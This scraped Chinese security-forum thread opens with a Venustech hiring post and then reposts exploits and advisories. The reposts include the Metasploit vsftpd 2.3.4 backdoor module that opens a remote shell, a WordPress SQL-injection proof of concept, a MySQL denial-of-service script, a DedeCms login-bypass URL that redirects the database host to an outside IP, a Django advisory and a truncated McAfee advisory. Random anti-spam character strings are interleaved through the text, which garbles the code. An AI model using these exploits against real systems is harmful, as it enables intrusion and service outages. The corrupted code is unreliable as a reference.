最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。% p9 g( W3 X5 {
    . t; l2 w3 v% A9 T2 ?' c' }+ T* ~/ c

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    . l4 `1 x$ q& ^# m7 X安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.. Q+ o$ g) Y- P; }0 N6 Z8 A% {
    精通C语言编程

    2.
    + D9 t7 e- q; ~! W9 E4 K熟练使用Linux操作系统,精通 Linux下C语言编程

    3.1 W/ Q8 b5 c! U
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.' T  ~1 b, U2 V' Z
    熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    ) k5 {, J9 z0 K3 I( L  o7 U7 g熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    ) J+ m& E, }9 Q负责产品的系统测试、集成测试工作

    2.4 ?% @8 q8 W3 v* c5 ~
    负责产品用例的编写,执行、修改

    3.
    , h. P1 T, V  R. }+ E# y: X7 Y负责产品性能的测试

    4.
    $ M! O/ ?; c1 f9 v! M负责对外项目的支持和测试工作

    岗位要求:

    1.6 e1 |* M( [6 s' u1 y$ Z' j3 a
    掌握基本的tcp/ip知识

    2.2 R% b: H/ M% F# g) h
    数通基础好

    3.
    4 B; E0 j: \: y2 o对linux有一定的基础

    4.! [) `& e# G# T* Z7 [# n3 u3 Z
    掌握数据库的搭建和使用

    5." \/ C" P. o. r& M# {
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6.8 M* J9 v5 n4 s, B- V2 s. ~% \
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.
    ( \& k( q) I$ W8 U1 ]+ ~9 A* y- x熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.4 T* ^8 i0 j( q3 ~6 P  G* l6 H
    对网络安全设备在网络中的部署有一定的认识

    9.. n6 ^$ {2 ~9 i% G
    掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.# t' @4 x) D* O( ~: ?
    木&马检测服务、WEB漏洞扫描服务的实施

    2.
    9 q, e; T: k  p; O: K( ^3 b3 g
    对服务客户的技术支持

    3.
    * R  Z0 V2 y$ l3 h7 X
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.. y/ ~( t9 ?) @
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.; U. S, m2 w' r4 K' `7 I' Q+ C
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
    0 j! S# ]4 v. ~- u% h& a( M
    # Z) b6 Z& X7 R# S) V8 N
    ' b/ f9 D6 G8 ~. Q- z# l1 ?. H( J
    ( w9 l; }; \9 a9 I  D' a. Hrequire msf/core2 y  V2 j/ A# H% }" w
    % B0 C& y  _6 e& h' P& E' ?
    class Metasploit3 < Msf::Exploit::Remote% h. v' y0 {8 T4 I. s  k. k
    Rank = ExcellentRanking0 p1 o! ]) u1 y3 T2 W
    + a" w1 ]  j2 V$ s9 G6 E
    include Msf::Exploit::Remote::Tcp
    $ i( v1 v: ]6 `, e, O3 D* m0 P  z3 y) K6 G, g* j1 A6 K
    def initialize(info = {})! ]7 a' W" e! I
    super(update_info(info' I, X3 W. h/ V9 l0 C3 O; o! |5 I
    Name => VSFTPD v2.3.4 Backdoor Command Execution' M' ]# @1 n' R8 V1 g+ [
    Descript_ion => %q{; @7 \% N1 S: ]; Z) [
    This module exploits a malicious backdoor that was added to the VSFTPD download& c7 E2 j7 |, B5 L7 U
    archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between' W4 b9 J. _- z5 M: v
    June 30th 2011 and July 1st 2011 according to the most recent information
    7 s2 f) i4 N! \2 \. i: b- u" |available. This backdoor was removed on July 3rd 2011.
    . d# N) q* Y" s7 `4 V1 o7 x5 I2 Q}! H4 {+ f4 E- f9 D( e1 ?
    Author => [ hdm mc ]
    6 }) }/ y6 P$ L% ELicense => MSF_LICENSE
    & z5 ]$ k2 [$ E" O1 ^Version => $Revision: 13099 $4 w9 _9 O8 V6 b; @% b  U# c
    References =>
    7 X0 Q3 x- Q- y/ z[' g4 }( e* l) e$ I9 v. l' @
    [ URL http://pastebin.com/AetT9sS5]
    ! `. A) `7 p& |) w[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]! n* @: c! v% B& H4 U) M* I
    ]
    " ]$ m$ w% X) n/ {, p9 CPrivileged => true* N+ q; J2 c% {7 x: v
    Platform => [ unix ]  }. G2 q! T5 ~
    Arch => ARCH_CMD
    ' Q* u( K$ R' }! t# f7 O: ^" f& PPayload =>
    8 Z  _( ^  @: Z4 P{* a% l  m  `# |& R# S# P! _0 d
    Space => 2000
    / h: t: x  O: r5 F& x' y/ {BadChars =>
    9 }: U0 V% o' F% H$ N; uDisableNops => true+ }/ o& V! @2 ]) Q1 k" @
    Compat =>3 G* |3 d, K0 E/ u# y7 G
    {
    0 E) \8 n5 M% {8 f, J/ d; c4 ZPayloadType => cmd_interact
    3 g" ]/ I% [: _7 z$ \& N6 I* }ConnectionType => find
    ( f2 y. |% L* f; T! K1 k}! n7 l0 J' d% L! O$ r
    }
    , q' T- p+ s" X( y3 O# KTargets =>
    3 o; u8 d8 ]8 [  I% P[- h, M3 @( e6 z, F% A( i/ z
    [ Automatic { } ]2 U0 B; x7 ]$ E( {" q$ v
    ]( p4 l; P6 u1 s" @6 l/ o( q9 ~
    DisclosureDate => Jul 3 20116 j  u  O1 N! \4 X) Z4 Z5 q3 b# i
    DefaultTarget => 0))+ g, q& F/ y: X- T8 m
    3 Z4 w! N3 ?- c" ^8 ^
    register_options([ Opt::RPORT(21) ] self.class)
    % j. l3 a  x3 B2 S: p6 yend
    6 Y0 u2 G+ o. m' T- l5 G
    % h: t! e1 p' I& Ndef exploit- M+ w& S8 x$ t1 D& ^; M

    + B2 h4 H1 q3 s% a* o5 U6 H3 T1 Gnsock = self.connect(false {RPORT => 6200}) rescue nil
    4 G2 w2 h" V. sif nsock$ ?* E/ |& d2 r- q$ ~+ L
    print_status(The port used by the backdoor bind listener is already open)
    0 x3 R  g  n* y9 x2 i6 c* \handle_backdoor(nsock)! n6 c4 `- A* b2 C0 g: w
    return. w% z- e" U  w  v+ i0 e
    end% ]3 p3 _6 r9 O+ x$ B$ \7 ]# _: F

    % t; N; N  ^0 |& ^. ^# Connect to the FTP service port first  G8 h. `5 P, J: _! e0 ~
    connect
    6 h9 Y0 c/ B) j! t4 n
    ! v6 m# h) G8 T' J8 c3 _/ U- ?banner = sock.get_once(-1 30).to_s  V$ G# b" [, K* |" E4 Q" ^
    print_status(Banner: #{banner.strip})7 l  w# @$ E) x3 }/ k
    + f& F$ c! k5 {5 U/ S9 u% f+ d4 |! }
    sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:); ?1 y6 M) G' S  W. E  X+ {* `
    )
    ) ^- i7 {+ ^% T* jresp = sock.get_once(-1 30).to_s
    $ l3 H( Z1 g$ _print_status(USER: #{resp.strip})
    2 P2 I  x, w* J* ~; U7 W
    7 M3 j& T' H9 _if resp =~ /^530 /
    . }. e8 D6 s1 a% \  C* Fprint_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    7 }* S1 \4 f( I1 mdisconnect, V' V' m. O3 U% H
    return/ _+ n$ D; l  e$ l
    end
    / @4 e0 X+ o5 D; e+ Q
    8 a. j3 _$ u+ `; k0 fif resp !~ /^331 /
    9 h7 A# p: V5 m2 o; C) lprint_error(This server did not respond as expected: #{resp.strip})6 y9 F+ K8 \* p% w" J, C+ j
    disconnect/ _$ `, n" k- ?* z
    return
    . E7 l3 x0 K  U3 dend+ [. d2 u  r4 G+ w5 R5 N

    + B( b% k0 ]- X- O- V, g$ {- B5 _sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}
    % \. O( o! j, A) q2 e- ~)
    6 w2 m9 Q7 Y) }- \& E6 M/ i) f- a* i/ c6 I0 M
    # Do not bother reading the response from password just try the backdoor
    5 }  Y! K+ ]: [" J; Nnsock = self.connect(false {RPORT => 6200}) rescue nil# n4 b7 u  }  Q" c  `
    if nsock8 M8 i! g" q) ?, ?" r" e
    print_good(Backdoor service has been spawned handling...)
    0 n( X2 u: v* ^# ]% A* W( W7 [$ T$ `handle_backdoor(nsock)( n+ w& C5 C6 f: v2 [0 r2 \* I
    return
    ( ?+ @5 W% M- }/ e+ C4 Tend
    0 n1 k7 }! h1 M/ M
    3 S4 P: K- Y" a+ ]$ N9 wdisconnect
    9 e7 k  Y' h) u; i4 B  l$ j6 V( }$ u+ E
    end
    " A, n( K# I7 G& E9 e! t
    / Q! B/ p# y% v" tdef handle_backdoor(s)
    % Y5 x# g: x/ O: b  ^" Q% T" h  s- a9 [, s: ^  b( J
    s.put(id: _2 Y/ I6 n0 w. \9 {& O
    )
    : d; r3 L/ ]( n) j1 I5 p" e# g$ u
    r = s.get_once(-1 5).to_s- T5 S2 o  F# ~" {  d- f- ?
    if r !~ /uid=/
    ) I- B* o, x0 \9 h! f& Zprint_error(The service on port 6200 does not appear to be a shell)4 d8 g/ F, w2 ?6 L+ D
    disconnect(s); [* V4 U9 z4 X: n! x
    return
    ' O) p- I- _. m/ ?/ b2 n6 P2 `6 I1 Dend. b2 w. A: I1 y/ O
    / k& W4 S$ n/ D% Z) p
    print_good(UID: #{r.strip})
    - S8 b. S  _4 c; Z* c2 A6 w! L5 D
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)( S7 c, ]  w+ c, f4 {1 {
    handler(s), e( [+ {1 {# t8 Z
    end* v" ~$ l$ |  q  @) V* |

    ' p) |$ D! u4 W1 u2 f& mend复制代码
    + g' l! l, Z7 E/ ?& S- R6 p" Y9 r2 g: H, V9 ~8 \; _# v7 K
    * E& P9 I$ H1 P) t- q
    / h/ D' U* N5 h5 |
    0 g4 ?: v. S* D/ s( q
    1 x- F( X" ]% ?* K7 X

    7 j# Q% n: G, D9 A* x& N
    3 k: s% p: Z$ b( v4 m% p& P8 |  c& v5 a' ^, s

    - {6 N2 b/ q) B) O8 C5 p8 @& X" D1 C5 U: P: _5 o; B! S' X
    4 {: O: d. u( R( f+ C
    1 ~3 N, H# I. [4 g
    3 S3 M) k4 K$ r& Z7 R

    # I1 g  C. e/ L3 l  z; f& n2 |: U
    7 F9 G) G/ m& N' [: s, e7 D4 q1 n
    6 L; {3 ^8 a/ |* A
    / `. O: b; S4 O
    9 }5 i5 M5 t8 _* q3 ]+ I+ Z( h公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:
    # o6 \; }  {, Z8 S: D1 h  P# P  
    0 }; X: H; b) @% ?3 K, m5 X     8 b/ [$ t$ X: c8 y: |4 E# Z9 u
      
    " X4 C" a& X+ M3 b9 {SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    ; _1 K6 @2 {3 z/ f7 s! C# xallows an authenticated user to execute arbitrary SQL commands via the id
    2 D" d! D* J* v" x- m7 T/ m( n9 aparameter to wp-admin/admin.php.   @/ P9 F; d' b7 _! k2 A# i
      3 \' h4 h8 G( ~( g: L' a$ k
       
    ! R, b( x$ c8 z4 K. v$ @5 \  n5 D3 U3 z  
    ( ?/ u: d! O" z6 \2. Proof of Concept:
    5 Q, |8 H7 W( K% }  I5 n$ A$ N  1 z; e: }' o0 D/ L- X
       
    , d. X9 @9 q$ ^* \( p. \  
    & K8 D' T' g9 bhttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
    ) t+ u4 E  C, @7 B$ \=1 AND SLEEP(10)
    1 \- m* ~  ]6 @/ [- x9 c# B9 Z- r: z( X1 s' y  {( C7 P# l
      
    & c  c/ n; M9 }   
    : l6 ]! X( ~  S3 w! l9 w  
    & }$ O$ c1 C& T3. Solution:
    ; u, B5 B$ P: _) b/ W. C6 l  
    % H. B( z  \; l     
    3 o* a% ?7 J' G$ e  - Q: |5 W! c) L' Y6 t% z
    The plugin has been removed from WordPress. Deactivate the plug-in and wait+ ^3 ~  m$ ~! R
    for a hotfix.
    + a& _7 T+ C/ x0 x  
    0 \: I+ f* o  b' W7 ~: u+ U+ U   4 h" s0 b) b+ w* O. i7 j
        W2 E- _$ g4 O2 C
    4. Reference:
    $ E  Z; N5 A- J& o5 w3 s. z  
    + C; v4 z0 {, _1 t; s. }   ' _' Z1 I# Z8 _/ a( \; j7 j
      1 L6 Q* _+ m$ [. V/ L+ _
    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje: z6 |- M: C. q6 ]* v8 y6 e
    ction-sqli/. }* t4 m7 G1 C; o3 `' ~
      
    : L/ \3 _, d( S, `1 j( Ahttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    9 Z* g! d2 C1 I1 z
    9 n  i3 r% q3 C/ w- ]4 d( ]
    0 e/ D; _: h2 U" S: V& G) Q  ^2 B6 b. j6 O9 ~
    / N/ ]8 R( j, H4 k3 \
    8 w6 w2 B1 `! I! Y& F: H
    ' F8 m, w( e2 K# \+ U4 q

    2 t5 T) A/ _: ^/ N) D# M
    8 Q! }/ j, z7 Y2 [
    . W. J/ x0 c: E/ v( A. y/ ^7 q
    9 e3 W4 c6 i2 i1 I- ]+ @
    . C% ^9 z6 u) d3 r- D' m0 {
    & r0 H1 f# E4 w; y# ?4 T2 H! ?
    1 ?' |' h0 W( Z7 R3 l' k& J9 q  s. f+ `/ x9 m% E

    3 |7 r; A0 i$ f" d: O
    ) U5 g' x" e6 R$ w
    $ W1 W8 D6 O, [: C: l8 b' X: @4 ?
    2 j6 K, C4 G5 r4 T公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    4 J7 I0 m% `# c" U/ D7 O
    # p! o9 l6 W8 z- A+ eprint "5 m4 m7 M. D8 |! |1 j
    "
    & t$ {5 m, c9 d7 I) nprint "----------------------------------------------------------------"
    ' n+ l% I, h: Bprint "| MySQL 5.5.8 Null Ptr (windows)                                |"
    3 n% ^- G7 r0 X- y8 hprint "| Level Smash the Stack                                         |"3 ^, r5 p& J" J
    print "----------------------------------------------------------------"/ [1 l# Q, Y7 h2 T6 F1 i" t
    print "# o7 n& |. L) Z, H! x
    "
    . D, I- c( |( r' p
    ; c: `, H/ b1 r! v4 ]  ^+ }6 e1 tbuf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"  n- R: |9 E4 X/ j- i& o" t
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")) c4 G, E$ \* |4 E! K; b1 W# K$ ]

    7 c! `& F$ c7 Wbuf2=("x11x00x00x00x03set autocommit30")- K# |$ o4 W1 r& w. a
    1 L2 B+ q7 u) B0 g, D
    def usage():
    ; {- F' [5 h) W( P8 P9 V: |1 tprint "usage : ./mysql.py <victim_ip>"" q5 [# T8 R/ `; Z% V
    print "example: ./mysql.py 192.168.1.22"
    2 w( _5 n* H% B" N0 Z $ v$ n0 @+ i5 n4 e  F4 T1 @

    $ |- Q0 F. W  x7 m0 Fdef main():/ P0 ]+ e) Q2 T: ?2 F8 |
    if len(sys.argv) != 2:
    " G2 ^% T5 G; \  Z5 @! l  @% `usage()9 Q+ t2 p9 d+ _& n
    sys.exit()! G- a- u) Y. g. c* m
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    & J) F7 H. _2 Q  m) w : z% Y$ L9 Z; }; S
    HOST = sys.argv[1]
    % @+ S9 N( y5 u, v. bPORT = int(3306)0 V& F. B( r/ x5 \4 L7 c3 F
    s.connect((HOST,PORT))
    * a! x, H' H; }print "
  • Connect"$ _! m3 I6 {4 {% W8 {
    s.send(buf)+ j: d6 q: q, l6 c
    print "
  • Payload 1 sent"
    / }; x/ N% m* y" k) v+ Ps.send(buf2)
    ' ?: Q& ]0 ~. \6 A, Fprint "
  • Payload 2 sent6 e# |2 S' T; N# u2 q: j3 j: {  L, n
    ", "
  • Run again to ensure it is down..
    . R+ g/ {/ \4 G* ]! S; p$ s; n6 X"+ Z  J1 \9 o# \: I
    s.close()' C7 @" e8 H2 q: Q0 q" G
    : a6 }* v7 v. n8 ~% w  j( H
    if __name__ == "__main__":
    ( g. M. x2 Y- a% ?9 q( ^main()0 `" C! F6 e7 P) T

    5 Z; ?0 k7 m4 D
    ; O' t/ X+ G8 v+ ?$ W
      u3 k) D/ s& [+ e( |: ]; o3 @% w; K9 y: y" F, Z

    7 f4 z9 e3 X3 S+ F3 W9 e5 C7 {3 ]0 q2 Z
    , a6 `" ~' L- l8 }: S
    & O+ O- i. \" F' _. C* \2 m
      l+ |" K$ f, x, K( ~
    : |* {; v0 @9 ^) D% a
    7 m) |8 P) L# m4 o
    / m* {; d: L4 J- F1 u8 A- ?5 W: @1 X- `/ ]2 {6 h& {
    4 I9 {8 P- w' W( a# h; l, l

    " Q' M* Q. E' W" p$ G4 M
    $ G! `/ c7 B- g, x* ~! v% c
    3 ^$ k9 a2 B; B; h9 d7 o+ r/ f* F& ?2 t+ P# G0 i1 j

    " B6 i" \" p+ P% ^6 t' ~4 Y0 U公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
      w) |1 P9 b$ J
    http://www.sitedir.com.cn/video/4.swf  S5 X4 T; y; C
    0 q$ @- F3 F" u1 J) E

    4 ^) D& B1 m1 o; n* z" w- c6 v5 e: |7 O

    " J* y5 _6 D' }  m0 i, z4 X' a
    3 `4 d- M2 ~8 z* \; z" c" H
    4 n: u: r6 `3 C: x! r4 T4 {1 w4 ~6 D6 x' q# S2 `. [
    % c  u1 {, m7 P0 \  i

    5 o( v& a* |0 j. g* R! n, S* f* @/ N4 B& b9 o! d1 K$ I9 C* _

    5 R  x5 c3 P& R- h/ m
    # z, `5 h$ @: L) N3 l$ w' m; e$ Y: V
    3 n9 ]6 a$ [, m- {9 e) y; y
    ! O2 C' C- L' `  g
    " \1 {3 c7 H: V! H9 i2 m
    # K. N" c/ S" t: g2 t; j3 H

    ; W" ]7 p* U! R/ U- R公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    7 d" X" o/ n2 p9 X
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台

    5 L" p% `) _  c" p9 H& B$ A1 }
    此漏洞的前提是必须得到后台路径才能实现

    2 _; H5 g( `5 B
    官方临时解决办法:

    ( I* X5 j( U: u& r
    找到include/common.inc.php文件,把:
    9 m. y. S1 w3 ?! N6 \2 A2 N
        foreach($_REQUEST as $_k=>$_v)
    " m0 P; o8 b) j7 @" ~9 @) W2 u    {
    8 j! B( Y4 r0 _        var_dump($_k);! @* R' A; C) E' x6 d9 F+ O( b
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    : D4 _; H0 O" g# z) a* y        {/ k1 J7 X2 t; Q7 v6 M
                exit('Request var not allow!');1 N# Q8 h( U8 Y- ~6 z: K6 t
            }
    ' S3 ]' `% S: K. y+ n    }

    9 K( e( l# s) S+ ]  r
    换成:

    + r- g' M* F  [  H5 ?
        //检查和注册外部提交的变量5 i& b6 R, ^- i# ~% Z5 ?
        function CheckRequest(&amp;$val) {4 W, l/ D, z/ o$ N& [
            if (is_array($val)) {
    0 b1 X' I" b& x            foreach ($val as $_k=>$_v) {
    ) d& U" J; N; r6 ]7 f3 Z5 X                CheckRequest($_k);
    4 t" a& w. b4 v+ }  o: R* x6 R+ o                CheckRequest($val[$_k]);! r- Q/ @0 S; O- A* G  C/ O
                }
    * Z, p$ f2 |+ s  A  M$ Q        } else
    - M0 V0 F" ~6 a6 f; z" n        {5 K2 T" G! l# H* r8 S" Z# p0 V
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )8 r, {3 A! I) Q5 G9 X/ w
                {
      H, M7 e! |+ U/ m                exit('Request var not allow!');6 C2 b8 o6 B' E. H( m7 N
                }7 x# O& L, a% T, V. o
            }' x" P1 k6 v  M7 ]1 o% e
        }
    - V, v. H/ H" E    CheckRequest($_REQUEST);
    ' P4 W' C7 i% x4 [5 D
    5 f& a' d: A) n2 \7 ]

    : G/ j% m$ t4 n4 K0 g9 K" v" z( k# D! t' e7 u  d0 n: H6 R# K
    3 c# Q' \6 P& ^0 o3 x5 I

    6 u8 Y( T7 v& O% @0 I
    $ W' u; I( J- {: x! X$ J4 f7 h( n" M+ v
    6 p0 a- A% {' @. O

    ) s% ^! R1 `) B5 m4 Q* [: `  G/ Q6 l+ O0 S

    + J* U3 m6 B4 W$ I9 R+ l# D5 K3 r# z# ^; Z0 c- v2 U5 t: O" d. N
    % q$ B5 B& p( @% m0 {0 Y3 b

    " J1 {5 W9 o3 O5 i9 v8 c. V* S! `" G5 e+ F  @0 }
    & g8 ?. _$ a: f- Y, s4 n5 Q

    # J4 f% i# `. O5 `& X6 f  E% O5 U  G+ r) Q
    ' _( K4 d0 j- z( Y
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>+ C' l1 w' f; N! u) S" t5 F) {

    + d: Q" ]( o! I9 n: t7 x- S; h3 yhttp://www.sitedir.com.cn/video/8.swf[/quote]  e0 b; S* N5 k1 _6 v/ n
    % e3 Y6 u; u0 j- E; Y1 r
    + C9 }4 U) o' q1 p

    2 }2 H0 T, [( \: U5 s* p
    5 i: Z& H( }6 `
    $ a* V6 u3 v+ z& j$ J
    ) g  |9 l. ^/ I! x5 _4 k3 ?$ d' [( ]; i

    ! _) {! k" M+ g/ b$ ]* O2 x& U" ~3 p) n, q
    5 f0 R6 X. n, o# Z! _
    2 ^3 }7 F4 v, h. ?  C) ]
    , z: a) C; d; s; G# A

    - g) O* {% K& D- p9 R4 F
    " T- Y1 |5 k4 U  ]7 Y8 J) `) |# r. Y$ U% k7 ^! t9 F, S# _

    % Q' d4 j' d2 C2 @% S3 |1 w0 L; [, v; O7 p$ z' N
    $ k0 E$ V  l- y5 h" i( g
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    ) y& }- C3 w  T$ e! E' `
    影响版本:1 A8 j- Y* O* \7 Z) M
    Django 1.2.56 o0 M8 M& a9 H7 g9 ^2 A4 @
    Django 1.3 beta 1/ ^: q; y1 n5 i& I( t' f
    Django 1.2.40 w2 p5 B0 a6 ]7 ]+ q7 Q* c5 D
    Django 1.2.2. |- L6 f, z0 Q
    Django 1.2
    : x: W8 k, K' Q5 |/ f
    漏洞描述:

    & Y8 {5 E3 o; V
    Django是一款开放源代码的Web应用框架,由Python写成。
    6 x% v6 _9 \0 aDjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。: ~. R1 j, i( R: e. s8 e/ N9 N
    1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    5 B7 \6 o, H( T  N2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。8 S  S0 o9 l6 w* I( g
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。6 {0 n( n3 K% R+ G- k( J
    4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。

    ( P7 J  I4 ]. a  a/ U$ ^
    细节参考:
    / Y7 @' j- a4 A/ K9 Thttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    5 [& l- H  ~# L) ~; a* ~http://secunia.com/advisories/45939/
      \& W' s: I; W% E

    " t5 S) Z6 O& I% V+ u+ k. H( a/ S" u) Y" g% }6 c
    ' H: b& h$ p4 W

    5 B1 Z- u$ A1 c2 n6 ~0 |3 Z% }% a& z0 s7 h  Q5 L# F; T
    # }# m1 ], S. `3 J6 I8 E

    5 H' r1 \6 _$ {' n, T- F5 u0 t  |
    ( U9 }7 ~* X- p8 C: N# w7 A! g0 g+ j. A
    5 T& }6 J: t1 L- r
    " w1 O7 _' b4 b  e1 c0 r
    6 `3 x" [2 i! Y, Y/ _( I  o
    % |% m/ ^- Q& M4 c1 J4 I. c
    / T9 C8 ^3 _  g( E4 l( U
    4 d: t5 O- ]* ?6 [# i" y: R5 m& A

    & n; ~% S- e& R  E/ s: G- D
    8 ~+ {( H. z( S" d; z% j
    4 J* n, T+ q) D0 h$ T
    . {& N. E; ^6 U/ A: ]公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code5 h+ i" z' ~2 b) y6 Z+ m7 o5 [1 V
    影响版本: McAfee LinuxShield <= 1.5.1
    5 }5 H) O) v/ Z$ m+ Z0 [远程攻击: Yes 7 \+ ?. t8 V% M3 `( G# x. H7 U
    本地溢出: Yes
    , t: d5 z+ n: r背景阅读:
    # W- v/ S& W3 l1 u===========
    ; x  A' ~2 H4 j4 u
    4 i1 m& k" g) N  Z  q- lLinuxShield detects and removes viruses and other potentially unwanted* }/ _0 I9 `3 }5 T/ X5 f, _  A
    software on Linux-based systems. LinuxShield uses the powerful McAfee+ n/ Q7 O3 S) g5 c( F  m
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our) w! x5 h( o4 a  @; {
    anti-virus products.
    ' H& D+ j; @: |( q# `2 e- Z+ b* x2 `3 d' @3 Y
    Although a few years ago, the Linux operating system was considered a
      R; K, \9 |8 v' h9 W% Wsecure environment, it is now seeing more occurrences of software% r# F# B2 W; ]
    specifically written to attack or exploit security weaknesses in
    # K/ T! j) u) \& PLinux-based systems. Increasingly, Linux-based systems interact with
    : \3 R! ~7 d2 e. wWindows-based computers. Although viruses written to attack Windows-
    7 z7 N& A8 `9 L' I4 w/ jbased systems do not directly attack Linux systems, a Linux server
    . `' o5 u+ L1 n# [can harbor these viruses, ready to infect any client that connects to
    4 B, y# g$ N5 }& U9 Mit.
    2 q0 L/ b1 M' i5 R
    * [) \( ~% c  A, p: H( ]5 pWhen installed on your Linux systems, LinuxShield provides protection0 D) G7 A6 p* f5 _( A
    against viruses, Trojan horses, and other types of potentially2 Z0 @' C3 t% |$ T  A/ e. e- {6 b
    unwanted software." V) ], W6 k3 J9 y

    & \; N9 Y0 z, A4 OLinuxShield scans files as they are opened and closed
    ( |2 @$ _: a/ ^3 A0 S! f- e7 z. _?&amp;#65533;&amp;#65533; a technique6 }4 ]4 X9 O8 H8 K% ]5 K& A
    known as on-access scanning. LinuxShield also incorporates an
    . s. r3 v2 P* I- q& w6 G8 Uon-demand scanner that enables you to scan any directory or file in6 D) Y! X# S$ x1 n& S
    your host at any time.
    1 k. s8 l+ U8 T$ n6 C
    5 A/ K7 Z- B# f0 f6 X0 B4 l" QWhen kept up-to-date with the latest virus-definition (DAT) files,
    ' h4 k( q; K! l" x  l2 D+ b8 ?LinuxShield is an important part of your network security. We
    * e( R/ e) B, Hrecommend that you set up an anti-virus security policy for your
    8 c8 |0 v0 u, C6 a$ B0 D1 ]network, incorporating as many protective measures as possible.2 X" k+ U6 x+ u& y2 a

      g4 ]: ~/ P, ]' SLinuxShield uses a web-browser interface, and a large number of
